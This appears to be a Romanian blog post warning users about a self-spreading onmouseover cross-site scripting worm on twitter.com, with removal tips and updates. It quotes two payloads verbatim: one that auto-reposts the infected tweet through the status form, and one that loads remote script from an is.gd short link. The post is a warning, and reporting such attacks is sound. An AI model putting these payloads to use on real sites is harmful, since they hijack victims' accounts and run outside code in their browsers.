Exploit de securitate pe Twitter

Azi, de vreo 15 minute au început să apară pe Twitter tot felul de mesaje care conțin același cod HTML și JavaScript. Ele vin de la utilizatorii care folosesc Twitter direct de pe twitter.com și conțin un script ascuns, care dă tweet-uri mai departe către urmăritorii lor.

Exploit-ul 1:

scriptul: http://a.no/@”onmouseover=”;$(‘textarea:first’).val(this.innerHTML);$(‘.status-update-form’).submit()” style=”color:#000;background:#000;/

Exploit-ul 2:

scriptul: http://t.co/@”style=”font-size:999999999999px;”onmouseover=”$.getScript(‘http:\u002f\u002fis.gd\u002ffl9A7’)”/

Sfaturi pentru eliminare:

1. Nu mai trece cu mouse-ul peste tweet-urile infectate! Da, ălea negre și textele uriașe

2. Folosește un client desktop de Twitter în loc de Twitter.com

Recomand Tweetdeck

Update: cică Twitter ar fi rezolvat problema(cel puțin la nivel de avertizare)

Update 2 : Mashable.com a descoperit și alte tipuri de scripturi – un pop-up, de exemplu. Nici TheNextWeb nu se lasă mai prejos – aici, un overlayer gri și niște mesaje de eroare